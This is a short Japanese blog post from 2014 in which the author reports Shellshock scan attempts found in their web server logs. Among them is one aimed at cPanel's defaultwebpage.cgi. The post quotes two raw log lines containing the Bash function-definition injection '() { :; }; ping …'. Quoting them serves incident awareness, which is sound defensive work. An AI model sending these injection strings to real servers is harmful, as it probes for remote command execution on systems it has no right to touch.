ShellShockの続き/cPanel経由狙いで来てるっぽい

Posted by nogajun - 2014/09/26

_

うちにも来てるのかなーと思って確認したら来てました。

 "GET / HTTP/1.0" "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"

これはいいのだけど、気になったのがこいつ。

 "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

「お前は誰だよ。/cgi-sys/defaultwebpage.cgiってなんだよ。」と思って調べたcPanelらしい。 なるほど。ホスティングマシンのコントロールパネルならシェル叩きそうだわなー。